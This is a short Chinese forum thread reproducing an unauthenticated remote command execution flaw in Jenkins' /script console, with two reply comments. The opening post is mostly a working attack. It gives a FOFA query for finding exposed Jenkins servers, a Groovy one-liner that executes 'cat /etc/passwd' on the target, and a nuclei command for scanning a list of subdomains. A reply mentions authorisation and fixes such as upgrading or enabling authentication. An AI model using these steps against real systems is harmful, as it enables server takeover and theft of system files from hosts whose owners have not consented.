漏洞复现 Jenkins script 远程命令执行漏洞
0x01 漏洞描述Jenkins是一个流行的开源持续集成和交付工具,它提供了一个可扩展的插件生态系统,可以用于自动化构建、测试和部署软件项目。Jenkins系统/script存在未授权远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
0x02 漏洞复现
fofa:app="Jenkins"
1.进入/script页面,执行cat /etc/passwd得到回
/scriptprintln 'cat /etc/passwd'.execute().text
2.nuclei验证脚本
nuclei.exe-tjenkins-script-unauth-rce.yaml-lsubs.txt-stats
Re: 漏洞复现 Jenkins script 远程命令执行漏洞
感谢分享这个漏洞复现案例。最近Jenkins确实有不少安全问题,/script路径下的未授权访问风险很高。想问问楼主,你复现时是否遇到权限限制?比如有些版本可能需要特定配置才能直接访问/script。另外,nuclei模板方便分享出来看看吗?Re: 漏洞复现 Jenkins script 远程命令执行漏洞
感谢楼主的分享,这篇复现过程清晰明了,直接给出了利用方式和验证脚本,对安全测试人员很有帮助。不过建议在实际测试前确认环境合规,避免在未授权系统上执行命令。另外,可以通过升级 Jenkins 或启用认证来修复此漏洞。再次感谢你的技术贡献!
页:
[1]